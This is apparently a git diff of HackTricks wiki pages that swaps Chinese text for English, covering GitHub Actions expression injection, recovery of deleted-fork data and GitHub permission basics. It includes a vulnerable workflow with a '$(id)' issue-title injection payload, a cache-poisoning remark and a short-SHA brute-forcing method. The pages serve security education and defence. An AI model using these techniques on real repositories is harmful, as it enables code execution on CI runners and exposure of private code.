- 监控日志中的 `Cache saved` 条目,或添加你自己的 cache-save 步骤,这样下一个 release job 会恢复该有效载荷并执行被 trojanized 的脚本或二进制文件。
## 参考资料
- [A Survey of 20242025 Open-Source Supply-Chain Compromises and Their Root Causes](https://words.filippo.io/compromise-survey/)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -2,73 +2,81 @@
{{#include ../../../banners/hacktricks-training.md}}
## 理解风险
## Understanding the risk
GitHub Actions 会在 step 执行前渲染表达式 ${{ ... }}。渲染后的值会被粘贴进该 step 的程序(对于 run steps,是一个 shell 脚本)。如果你在 run: 中直接插入不受信任的输入attacker 将能控制部分 shell 程序并执行 arbitrary commands
GitHub Actions renders expressions ${{ ... }} before the step executes. The rendered value is pasted into the steps program (for run steps, a shell script). If you interpolate untrusted input directly inside run:, the attacker controls part of the shell program and can execute arbitrary commands.
Docs: https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions and contexts/functions: https://docs.github.com/en/actions/learn-github-actions/contexts
要点:
- 渲染发生在执行之前。run 脚本会在所有表达式解析完后生成,然后由 shell 执行。
- 许多 contexts 包含取决于触发事件的用户可控字段(issuesPRscommentsdiscussionsforksstars 等)。参见 untrusted input 参考: https://securitylab.github.com/resources/github-actions-untrusted-input/
- 在 run: 内部对 shell 进行引号转义并不是可靠的防护因为注入发生在模板渲染阶段。Attackers 可以通过精心构造的输入打破引号或注入操作符。
Key points:
- Rendering happens before execution. The run script is generated with all expressions resolved, then executed by the shell.
- Many contexts contain user-controlled fields depending on the triggering event (issues, PRs, comments, discussions, forks, stars, etc.). See the untrusted input reference: https://securitylab.github.com/resources/github-actions-untrusted-input/
- Shell quoting inside run: is not a reliable defense, because the injection occurs at the template rendering stage. Attackers can break out of quotes or inject operators via crafted input.
## Vulnerable pattern → RCE on runner
Vulnerable workflow (triggered when someone opens a new issue):
```yaml
name: New Issue Created
on:
issues:
types: [opened]
issues:
types: [opened]
jobs:
deploy:
runs-on: ubuntu-latest
permissions:
issues: write
steps:
- name: New issue
run: |
echo "New issue ${{ github.event.issue.title }} created"
- name: Add "new" label to issue
uses: actions-ecosystem/action-add-labels@v1
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
labels: new
deploy:
runs-on: ubuntu-latest
permissions:
issues: write
steps:
- name: New issue
run: |
echo "New issue ${{ github.event.issue.title }} created"
- name: Add "new" label to issue
uses: actions-ecosystem/action-add-labels@v1
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
labels: new
```
如果 attacker 打开一个标题为 $(id) 的 issue渲染后的步骤变为
If an attacker opens an issue titled $(id), the rendered step becomes:
```sh
echo "New issue $(id) created"
```
命令替换在 runner 上运行 id。示例输出
The command substitution runs id on the runner. Example output:
```
New issue uid=1001(runner) gid=118(docker) groups=118(docker),4(adm),100(users),999(systemd-journal) created
```
为什么引用无法保护你:
- 表达式会先被渲染,然后渲染得到的脚本会被执行。如果不受信任的值包含 $(...)、`;``"`/`'` 或换行,它仍能改变程序结构,即使你已做了引用。
## 安全模式 (shell variables via env)
Why quoting doesnt save you:
- Expressions are rendered first, then the resulting script runs. If the untrusted value contains $(...), `;`, `"`/`'`, or newlines, it can alter the program structure despite your quoting.
## Safe pattern (shell variables via env)
Correct mitigation: copy untrusted input into an environment variable, then use native shell expansion ($VAR) in the run script. Do not re-embed with ${{ ... }} inside the command.
正确的缓解措施:将不受信任的输入复制到环境变量,然后在 run 脚本中使用原生 shell 展开 ($VAR)。不要在命令中用 ${{ ... }} 重新嵌入。
```yaml
# safe
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- name: New issue
env:
TITLE: ${{ github.event.issue.title }}
run: |
echo "New issue $TITLE created"
deploy:
runs-on: ubuntu-latest
steps:
- name: New issue
env:
TITLE: ${{ github.event.issue.title }}
run: |
echo "New issue $TITLE created"
```
注意事项:
- 避免在 run: 中使用 ${{ env.TITLE }}。那会重新将模板渲染引入命令,从而带来相同的注入风险。
- 优先通过 env: 映射传递不受信任的输入,并在 run: 中使用 $VAR 引用它们。
## 可被读者触发的表面(视为不受信任)
Notes:
- Avoid using ${{ env.TITLE }} inside run:. That reintroduces template rendering back into the command and brings the same injection risk.
- Prefer passing untrusted inputs via env: mapping and reference them with $VAR in run:.
仅对公共仓库具有只读权限的账户仍然可以触发许多事件。由这些事件派生的 contexts 中的任何字段,除非另有证明,否则都必须被视为由攻击者控制。示例:
## Reader-triggerable surfaces (treat as untrusted)
Accounts with only read permission on public repositories can still trigger many events. Any field in contexts derived from these events must be considered attacker-controlled unless proven otherwise. Examples:
- issues, issue_comment
- discussion, discussion_comment (orgs can restrict discussions)
- pull_request, pull_request_review, pull_request_review_comment
@@ -77,14 +85,14 @@ echo "New issue $TITLE created"
- watch (starring a repo)
- Indirectly via workflow_run/workflow_call chains
哪些具体字段被攻击者控制取决于事件。请参考 GitHub Security Labs untrusted input 指南:https://securitylab.github.com/resources/github-actions-untrusted-input/
Which specific fields are attacker-controlled is event-specific. Consult GitHub Security Labs untrusted input guide: https://securitylab.github.com/resources/github-actions-untrusted-input/
## 实用建议
## Practical tips
- 尽量减少在 run: 中使用 expressions。优先使用 env: 映射并使用 $VAR
- 如果必须转换输入,请在 shell 中使用安全工具(例如 printf %qjq -r 等)进行,且仍然应从 shell 变量开始。
- 在将分支名、PR 标题、用户名、标签、讨论标题以及 PR head refs 插入到脚本、命令行参数或文件路径时,要格外小心。
- 对于 reusable workflows composite actions,采用相同模式:映射到 env然后引用 $VAR
- Minimize use of expressions inside run:. Prefer env: mapping + $VAR.
- If you must transform input, do it in the shell using safe tools (printf %q, jq -r, etc.), still starting from a shell variable.
- Be extra careful when interpolating branch names, PR titles, usernames, labels, discussion titles, and PR head refs into scripts, command-line flags, or file paths.
- For reusable workflows and composite actions, apply the same pattern: map to env then reference $VAR.
## References
@@ -93,4 +101,4 @@ echo "New issue $TITLE created"
- [Contexts and expression syntax](https://docs.github.com/en/actions/learn-github-actions/contexts)
- [Untrusted input reference for GitHub Actions](https://securitylab.github.com/resources/github-actions-untrusted-input/)
{{#include ../../../banners/hacktricks-training.md}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,56 +1,58 @@
# 在Github中访问已删除的数据
# Accessible Deleted Data in Github
{{#include ../../banners/hacktricks-training.md}}
访问据称已删除的Github数据的方法在[**这篇博客文章中报告**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
## 访问已删除的Fork数据
## Accessing Deleted Fork Data
1. 你Fork一个公共仓库
2. 你向你的Fork提交代码
3. 你删除你的Fork
1. You fork a public repository
2. You commit code to your fork
3. You delete your fork
> [!CAUTION]
> 在已删除的Fork中提交的数据仍然可以访问。
> The data commited in the deleted fork is still accessible.
## 访问已删除的仓库数据
## Accessing Deleted Repo Data
1. 你在GitHub上有一个公共仓库。
2. 一个用户Fork了你的仓库。
3. 你在他们Fork之后提交数据而他们从未将他们的Fork与您的更新同步
4. 你删除整个仓库。
1. You have a public repo on GitHub.
2. A user forks your repo.
3. You commit data after they fork it (and they never sync their fork with your updates).
4. You delete the entire repo.
> [!CAUTION]
> 即使你删除了你的仓库所有对其所做的更改仍然可以通过Fork访问。
> Even if you deleted your repo, all the changes made to it are still accessible through the forks.
## 访问私有仓库数据
## Accessing Private Repo Data
1. 你创建一个最终会公开的私有仓库。
2. 你创建该仓库的私有内部版本通过Fork并提交额外的代码以实现你不打算公开的功能。
3. 你将你的“上游”仓库设为公共并保持你的Fork为私有。
1. You create a private repo that will eventually be made public.
2. You create a private, internal version of that repo (via forking) and commit additional code for features that youre not going to make public.
3. You make your “upstream” repository public and keep your fork private.
> [!CAUTION]
> 在内部Fork创建和公共版本公开之间的时间内可以访问推送到内部Fork的所有数据。
> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public.
## 如何发现已删除/隐藏Fork的提交
## How to discover commits from deleted/hidden forks
同一篇博客文章提出了2个选项
The same blog post propose 2 options:
### 直接访问提交
### Directly accessing the commit
如果已知提交IDsha-1可以在`https://github.com/<user/org>/<repo>/commit/<commit_hash>`中访问它。
If the commit ID (sha-1) value is known it's possible to access it in `https://github.com/<user/org>/<repo>/commit/<commit_hash>`
### 暴力破解短SHA-1值
### Brute-forcing short SHA-1 values
访问这两者是相同的:
It's the same to access both of these:
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
而最新的一个使用了一个可以暴力破解的短sha-1。
And the latest one use a short sha-1 that is bruteforceable.
## 参考
## References
- [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,188 +1,194 @@
# 基本 Github 信息
# Basic Github Information
{{#include ../../banners/hacktricks-training.md}}
## 基本结构
## Basic Structure
大型 **company** 的基本 github 环境结构通常是拥有一个 **enterprise**,该 **enterprise** 拥有 **多个 organizations**,每个 organization 可能包含 **多个 repositories** **多个 teams**。较小的公司可能只 **拥有一个 organization 并且没有 enterprises**
The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**.
从用户角度来看,一个 **user** 可以是 **不同 enterprise organization 的 member**。在这些范围内,用户可能拥有 **不同的 enterpriseorganization repository 角色**
From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**.
此外,用户可能 **属于不同的 teams**,在这些 team 中拥有不同的 enterpriseorganization repository 角色。
Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles.
最后,**repositories 可能有特殊的保护机制**。
And finally **repositories may have special protection mechanisms**.
## 权限
## Privileges
### Enterprise Roles
- **Enterprise owner**:拥有此角色的人可以 **管理管理员、管理 enterprise 内的 organizations、管理 enterprise 设置、在 organizations 之间强制执行策略**。但他们 **不能访问 organization 设置或内容**,除非被设为 organization owner 或被授予对某个 organization 所有仓库的直接访问权限。
- **Enterprise members**:由你的 enterprise 拥有的 organizations 的成员也会 **自动成为 enterprise 的成员**
- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
### Organization Roles
在一个 organization 中,用户可以拥有不同的角色:
In an organisation users can have different roles:
- **Organization owners**Organization owners 对组织具有 **完全的管理访问权限**。该角色应当限制分配,但组织中至少不应少于两人拥有该角色。
- **Organization members**:对于组织中的人员,默认的非管理角色是 organization member。默认情况下,organization members **拥有若干权限**
- **Billing managers**Billing managers 是能够 **管理组织的计费设置**(例如支付信息)的用户。
- **Security Managers**:这是 organization owners 可以分配给组织中任意 team 的角色。分配后,该 team 的每个成员将获得 **管理整个组织的安全警报和设置的权限,以及对组织中所有 repositories 的只读权限**
- 如果你的组织有一个 security team可以使用 security manager 角色为该 team 的成员赋予他们在组织中所需的最小访问权限。
- **Github App managers**:为了允许额外的用户 **管理组织拥有的 GitHub Apps**owner 可以授予他们 GitHub App manager 权限。
- **Outside collaborators**outside collaborator 是指那些 **对一个或多个组织仓库有访问权限但并不是明确的组织成员** 的人。
- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
- If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
你可以在此表格中 **比较这些角色的权限**[https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
### Members Privileges
_https://github.com/organizations/\<org_name>/settings/member_privileges_ 你可以查看 **仅因成为该组织的一员而赋予用户的权限**
In _https://github.com/organizations/\<org_name>/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**.
这里配置的设置将指示组织成员的以下权限:
The settings here configured will indicate the following permissions of members of the organisation:
- 对组织中所有仓库是管理员、写入者、只读或无权限。
- 成员是否可以创建 privateinternal public 仓库。
- 是否允许对仓库进行 fork。
- 是否可以邀请 outside collaborators
- 是否可以发布 public private sites
- 管理员对仓库的权限范围。
- 成员是否可以创建新的 teams
- Be admin, writer, reader or no permission over all the organisation repos.
- If members can create private, internal or public repositories.
- If forking of repositories is possible
- If it's possible to invite outside collaborators
- If public or private sites can be published
- The permissions admins has over the repositories
- If members can create new teams
### Repository Roles
默认创建的 repository 角色:
By default repository roles are created:
- **Read**:推荐给希望查看或讨论项目的 **非代码贡献者**
- **Triage**:推荐给 **需要主动管理 issues pull requests 但不需要写权限的贡献者**
- **Write**:推荐给 **需要主动向项目推送的贡献者**
- **Maintain**:推荐给 **需要管理仓库但不需访问敏感或破坏性操作的项目经理**
- **Admin**:推荐给需要对项目拥有 **完全访问权限** 的人员,包括管理安全或删除仓库等敏感和破坏性操作。
- **Read**: Recommended for **non-code contributors** who want to view or discuss your project
- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
- **Write**: Recommended for contributors who **actively push to your project**
- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
你可以在此表格中 **比较每个角色的权限**[https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
你也可以在 _https://github.com/organizations/\<org_name>/settings/roles_ 创建你自己的角色。
You can also **create your own roles** in _https://github.com/organizations/\<org_name>/settings/roles_
### Teams
你可以在 _https://github.com/orgs/\<org_name>/teams/_ 列出组织中创建的 teams。注意要看到作为其他 teams 子团队的 teams你需要访问每个父团队。
You can **list the teams created in an organization** in _https://github.com/orgs/\<org_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
### Users
组织的用户可以在 _https://github.com/orgs/\<org_name>/people._ 列出。
The users of an organization can be **listed** in _https://github.com/orgs/\<org_name>/people._
在每个用户的信息中,你可以看到该用户 **所属的 teams** 以及 **该用户有权限访问的 repos**
In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
## Github Authentication
Github 提供多种方式来验证你的账户并代表你执行操作。
Github offers different ways to authenticate to your account and perform actions on your behalf.
### Web Access
访问 **github.com** 时,你可以使用 **用户名和密码** 登录(并可能需要 **2FA**)。
Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
### **SSH Keys**
你可以为你的账户配置一把或多把公钥,允许相应的 **私钥代表你执行操作。** [https://github.com/settings/keys](https://github.com/settings/keys)
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
#### **GPG Keys**
**不能用这些密钥冒充用户**,但如果你不使用 GPG可能会因为提交没有签名而被发现。更多关于 [vigilant mode 的信息在这里](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode)
You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
### **Personal Access Tokens**
你可以生成 personal access token **授予一个应用访问你的账户**。在创建 personal access token 时,**user** 需要 **指定** 该 token 将拥有的 **权限**[https://github.com/settings/tokens](https://github.com/settings/tokens)
You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
### Oauth Applications
Oauth applications 可能会向你请求权限,**以访问你部分 github 信息或以你的身份执行操作**。一个常见例子是某些平台上的 **login with github 按钮**
Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
- 你可以在 [https://github.com/settings/developers](https://github.com/settings/developers) 创建你自己的 **Oauth applications**
- 你可以在 [https://github.com/settings/applications](https://github.com/settings/applications) 查看所有 **已获准访问你账户的 Oauth applications**
- 你可以在 [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) 查看 **Oauth Apps 可以申请的 scopes**
- 你可以在组织中查看第三方应用访问情况:_https://github.com/organizations/\<org_name>/settings/oauth_application_policy_
- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
- You can see third party access of applications in an **organization** in _https://github.com/organizations/\<org_name>/settings/oauth_application_policy_
一些 **安全建议**
Some **security recommendations**:
- 一个 **OAuth App** 应始终 **以验证过的 GitHub 用户的身份在整个 GitHub 上执行操作**(例如,在提供用户通知时),并且仅能访问指定的 scopes
- 通过为已验证用户启用 “Login with GitHub”OAuth App 可以用作身份提供者。
- **不要** 构建 **OAuth App** 如果你希望你的应用只作用于 **单个仓库**With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
- **不要** 构建 OAuth App 作为你 **团队或公司的应用**OAuth Apps **单个用户** 身份进行认证,所以如果某人为公司创建了 OAuth App后来离职则其他人将无法访问该应用。
- **更多信息** [这里](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps)
- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes..
- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
### Github Applications
Github applications 可以请求权限以 **访问你的 github 信息或以你的身份执行** 针对特定资源的操作。在 Github Apps 中,你需要指定该应用将能访问的 repositories。
Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
- 要安装 GitHub App你必须是 **organisation owner 或在某个仓库中有 admin 权限**
- GitHub App 应该 **连接到个人账户或组织**
- 你可以在 [https://github.com/settings/apps](https://github.com/settings/apps) 创建你自己的 Github application。
- 你可以在 [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) 查看所有 **已获准访问你账户的 Github applications**
- 这是 **Github Applications 的 API Endpoints**[https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)。根据应用的权限,它将能够访问其中的一部分。
- 你可以在组织中查看已安装的应用:_https://github.com/organizations/\<org_name>/settings/installations_
- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
- The GitHub App should **connect to a personal account or an organisation**.
- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them
- You can see installed apps in an **organization** in _https://github.com/organizations/\<org_name>/settings/installations_
一些安全建议:
Some security recommendations:
- 一个 GitHub App 应该 **独立于用户采取行动**(除非该应用使用 [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token)。为了使 user-to-server 访问令牌更安全,你可以使用将在 8 小时后过期的 access tokens以及可以换取新 access token 的 refresh token。更多信息参见 “[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens).
- 确保 GitHub App 与 **特定的 repositories** 集成。
- GitHub App 应该 **连接到个人账户或组织**
- 不要期望 GitHub App 能了解并完成用户能做的所有操作。
- **如果你仅需要“Login with GitHub”服务请不要使用 GitHub App。** 但 GitHub App 可以使用 [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) 来登录用户并执行其他操作。
- 如果你只是想作为一个 GitHub 用户去做该用户能做的一切,不要构建 GitHub App。
- 如果你在 GitHub Actions 中使用你的应用并想修改 workflow 文件,必须代表用户使用包含 `workflow` scope 的 OAuth token 进行身份验证。用户必须对包含 workflow 文件的仓库具有 admin 或 write 权限。更多信息,见 “[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes).
- **更多信息** [这里](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps)
- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
- Make sure the GitHub App integrates with **specific repositories**.
- The GitHub App should **connect to a personal account or an organisation**.
- Don't expect the GitHub App to know and do everything a user can.
- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
### Github Actions
**并不是在 github 中进行身份验证的一种方式**,但一个 **恶意的** Github Action 可能会获得 **未授权的 github 访问**,并且根据赋予该 Action 的 **权限**,可以实施多种 **不同的攻击**。下面会有更多信息。
This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
## Git Actions
Git actions 允许在 **某个事件发生时自动执行代码**。通常被执行的代码与仓库中的代码 **某种程度相关**(例如构建 docker 容器或检查 PR 中是否包含 secrets)。
Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
### Configuration
_https://github.com/organizations/\<org_name>/settings/actions_ 可以查看组织的 **github actions 的配置**
In _https://github.com/organizations/\<org_name>/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
可以完全禁止使用 github actions、**允许所有 github actions**,或仅允许特定的 actions
It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions.
还可以配置 **谁需要批准运行一个 Github Action** 以及 Github Action 运行时的 **GITHUB_TOKEN 的权限**
It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run.
### Git Secrets
Github Action 通常需要某种 secrets 来与 github 或第三方应用交互。为了 **避免将它们以明文放入仓库**github 允许将它们作为 **Secrets** 存放。
Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**.
These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like:
这些 secrets 可以为单个 repo 配置,也可以为整个组织配置。然后,为了让 **Action 能够访问该 secret**,你需要像下面这样声明它:
```yaml
steps:
- name: Hello world action
with: # Set the secret as an input
super_secret:${{ secrets.SuperSecret }}
env: # Or as an environment variable
super_secret:${{ secrets.SuperSecret }}
- name: Hello world action
with: # Set the secret as an input
super_secret:${{ secrets.SuperSecret }}
env: # Or as an environment variable
super_secret:${{ secrets.SuperSecret }}
```
#### 使用 Bash 的示例 <a href="#example-using-bash" id="example-using-bash"></a>
#### Example using Bash <a href="#example-using-bash" id="example-using-bash"></a>
```yaml
steps:
- shell: bash
env: SUPER_SECRET:${{ secrets.SuperSecret }}
run: |
example-command "$SUPER_SECRET"
- shell: bash
env: SUPER_SECRET:${{ secrets.SuperSecret }}
run: |
example-command "$SUPER_SECRET"
```
> [!WARNING]
> Secrets **只能从声明了它们的 Github Actions 访问**。
> Secrets **can only be accessed from the Github Actions** that have them declared.
> 一旦在 repo 或组织中配置后,**github 的用户将无法再次访问它们**,他们只能 **更改它们**
> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**.
因此,**窃取 github secrets 的唯一方法是能够访问正在执行该 Github Action 的机器**(在这种情况下你只能访问为该 Action 声明的 secrets
Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
### Git 环境
### Git Environments
Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
Github 允许创建 **环境**,在其中可以保存 **secrets**。然后,你可以像下面这样给 github action 授予对该环境内 secrets 的访问权限:
```yaml
jobs:
deployment:
runs-on: ubuntu-latest
environment: env_name
deployment:
runs-on: ubuntu-latest
environment: env_name
```
You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\
Additionally, environment protections include:
- **Required reviewers**: gate jobs targeting the environment until approved. Enable **Prevent self-review** to enforce a proper foureyes principle on the approval itself.
@@ -227,12 +233,12 @@ The **branch protections of a repository** can be found in _https://github.com/\
Different protections can be applied to a branch (like to master):
- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:
- **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
- **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
- **Require approval of the most recent reviewable push**. Ensures that any new commits after an approval (including pushes by other collaborators) re-trigger review so an attacker cannot push post-approval changes and merge.
- **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
- **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
- **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
- **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
- **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
- **Require approval of the most recent reviewable push**. Ensures that any new commits after an approval (including pushes by other collaborators) re-trigger review so an attacker cannot push post-approval changes and merge.
- **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
- **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
- **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
- **Require status checks to pass before merging.** Some checks need to pass before being able to merge the commit (like a GitHub App reporting SAST results). Tip: bind required checks to a specific GitHub App; otherwise any app could spoof the check via the Checks API, and many bots accept skip directives (e.g., "@bot-name skip").
- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
- **Require signed commits**. The commits need to be signed.
@@ -267,3 +273,5 @@ This chain prevents a single collaborator from retagging or force-publishing rel
- [GitHub Actions: A Cloudy Day for Security - Part 1](https://binarysecurity.no/posts/2025/08/securing-gh-actions-part1)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,79 +1,85 @@
# Jenkins 安全
# Jenkins Security
{{#include ../../banners/hacktricks-training.md}}
## 基本信息
## Basic Information
